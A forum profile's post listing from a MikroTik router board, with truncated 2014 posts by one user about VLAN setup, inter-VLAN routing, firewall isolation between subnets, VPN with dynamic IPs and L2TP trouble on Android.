Re: VLAN interface as a slave of physical Interface

Ahhhh gotcha, yeah I read that wrong.....
by 43north
Sat Nov 22, 2014 10:33 am
Forum: Beginner Basics
Topic: Need help to setup VPN between two sites
Replies: 7
Views: 3299

Re: Need help to setup VPN between two sites

Easy to do but first you need to take care of those dynamic IP addresses..... You can use them dynamically but you will have to go in to both mikrotiks each time they change and update the info for the VPN tunnel. I went the free route to take care of this issue for me. Check out no-ip.com and get y...
by 43north
Sat Nov 22, 2014 10:29 am
Forum: General
Topic: Van basic question
Replies: 1
Views: 1135

Re: Van basic question

I believe they have to be interfaced with a physical or possibly logical port (other VLAN). Why don't you want to just attach your other VLANS to your trunk port 5?
by 43north
Sat Nov 22, 2014 10:21 am
Forum: General
Topic: VLAN interface as a slave of physical Interface
Replies: 8
Views: 5743

Re: VLAN interface as a slave of physical Interface

Capture.JPG
Yes just create your vlan and then on the interface drop down of the vlan assign it to port 1 of the router.
by 43north
Sat Nov 22, 2014 10:06 am
Forum: General
Topic: Network diagram software?
Replies: 8
Views: 5229

Network diagram software?

Looking for a good free network diagram software to create some visual aids. Hoping someone has some recommendations for one that doesn't require user account or that is locked down until you pay etc.
by 43north
Sat Nov 22, 2014 9:53 am
Forum: Beginner Basics
Topic: Inter-Vlan Routing
Replies: 5
Views: 3367

Re: Inter-Vlan Routing

The VLANS should by default route between the different subnets, then you can control isolation through the firewall. I was really struggling with them until I figured out trunking, tagging, and PVID setting on my SWITCH. Once I grasped that it was easy to setup multiple inter-routing VLANS. I made ...
by 43north
Wed Nov 19, 2014 5:57 am
Forum: General
Topic: Help with Firewall rule for VLAN traffic
Replies: 4
Views: 1858

Re: Help with Firewall rule for VLAN traffic

Jarda can you type out a firewall as an example for me to see what you mean?
by 43north
Tue Nov 18, 2014 8:17 am
Forum: General
Topic: IP Camera Subnet
Replies: 36
Views: 10185

Re: IP Camera Subnet

With that many cameras I don't know that it matters. I just like the flexibility of VLANS I can assign them to any physical ports that I want and never have to physically move cables around. Now I am dealing with a handful of different subnets that I am trying to manage so my application is a little...
by 43north
Tue Nov 18, 2014 7:20 am
Forum: General
Topic: IP Camera Subnet
Replies: 36
Views: 10185

Re: IP Camera Subnet

That may work just fine too. I am just a fan of VLANs since I trunk multiple VLANS traffic on a single physical port when the need arises. You would have to have a heck of a lot of traffic to bog down even a single gigabit port.... And even if I get to the point of reaching those limits I will just ...
by 43north
Tue Nov 18, 2014 7:13 am
Forum: Beginner Basics
Topic: Inter-Vlan Routing
Replies: 5
Views: 3367

Re: Inter-Vlan Routing

VLANS are pretty easy to setup on Tiks, I researched it through Googleing and watching videos in less than a day. There is a lot of info out there. To get you started though..... Click on Interface tab-> VLAN and then just create a new one. Then under IP tab on left you will have to input the addres...
by 43north
Tue Nov 18, 2014 6:52 am
Forum: General
Topic: IP Camera Subnet
Replies: 36
Views: 10185

Re: IP Camera Subnet

You are on the right track. For our IP cameras we just created a VLAN and assigned the VLAN to a port. Then the cameras are on their own broadcast domain. If you want the two subnets to communicate with each other just put the VLAN on the master port of your primary subnet and then the port will be ...
by 43north
Tue Nov 18, 2014 6:31 am
Forum: General
Topic: Hotel secure ports with CRS125-24G?
Replies: 5
Views: 1743

Re: Hotel secure ports with CRS125-24G?

Seems like you could assign different subnet to each port and use firewall rules to drop between the subnets? Not sure if that would be the best way but just what came to mind for me....
by 43north
Mon Nov 17, 2014 10:06 pm
Forum: General
Topic: Help with Firewall rule for VLAN traffic
Replies: 4
Views: 1858

Help with Firewall rule for VLAN traffic

Okay I know how to setup a firewall rule to isolate different VLAN subnets..... but if I have VLAN1 and VLAN2 how do I setup a rule to allow VLAN1 to see and access VLAN2 but NOT to allow VLAN2 to see and access VLAN1?
by 43north
Sat Nov 15, 2014 9:03 am
Forum: Beginner Basics
Topic: What would cause this DHCP WAN problem on a RB750?
Replies: 4
Views: 1894

What would cause this DHCP WAN problem on a RB750?

So I just purchased a RB750 for my home. My cable ISP is simply a DHCP connection type. I have it all setup but the WAN connection simply doesn't pull the DHCP from my ISP..... Under DHCP clients tab is just stays as "searching". The weird thing is I had setup a CCR1009-8G-1S-1S+ at home w...
by 43north
Sat Nov 15, 2014 12:38 am
Forum: General
Topic: L2TP VPN problem with Android Client
Replies: 1
Views: 1767

L2TP VPN problem with Android Client

So I have L2TP setup on my MikroTik and working perfect with iphone, ipad, and windows clients. I have an Android tablet that I am having trouble with though..... It connects just fine and authenticates but I can not pass any network traffic through the tunnel. Can't ping anything. Router log shows ...
by 43north
Fri Nov 14, 2014 8:21 am
Forum: Beginner Basics
Topic: Tutorials?
Replies: 3
Views: 1941

Tutorials?

I am brand new to MikroTik routers. I was wondering if there is a place where there are some step by step tutorials for some of the configuration setups? I do not do command line interface so anything for Webfig etc is what I am looking for....Thanks!